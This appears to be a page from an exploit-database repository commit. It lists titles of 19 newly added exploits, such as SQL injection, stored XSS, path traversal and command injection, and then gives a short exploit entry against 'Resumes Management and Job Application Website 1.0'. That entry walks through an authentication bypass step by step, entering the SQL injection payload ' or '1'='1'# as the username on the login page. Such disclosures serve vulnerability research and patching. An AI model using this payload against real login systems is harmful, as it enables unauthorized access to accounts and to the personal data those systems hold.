2c7e8b1ddc
19 changes to exploits/shellcodes Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission IncomCMS 2.0 - Insecure File Upload House Rental and Property Listing 1.0 - Multiple Stored XSS Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection) WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS Online Movie Streaming 1.0 - Authentication Bypass Responsive ELearning System 1.0 - 'id' Sql Injection Baby Care System 1.0 - 'Post title' Stored XSS Responsive FileManager 9.13.4 - 'path' Path Traversal Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated) HPE Edgeline Infrastructure Manager 1.0 - Multiple Remote Vulnerabilities Cassandra Web 0.5.0 - Remote File Read CSZ CMS 1.2.9 - Multiple Cross-Site Scripting Online Learning Management System 1.0 - RCE (Authenticated) Klog Server 2.4.1 - Command Injection (Unauthenticated) EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
11 lines
No EOL
506 B
Text
11 lines
No EOL
506 B
Text
# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
|
|
# Date: 2020-12-27
|
|
# Exploit Author: Kshitiz Raj (manitorpotterk)
|
|
# Vendor Homepage: http://egavilanmedia.com
|
|
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
|
|
# Version: 1.0
|
|
# Tested on: Windows 10/Kali Linux
|
|
|
|
Step 1 - Go to url http://localhost/Resumes/login.html
|
|
Step 2 - Enter Username :- ' or '1'='1'#
|
|
Step 3 - Enter Password - anything |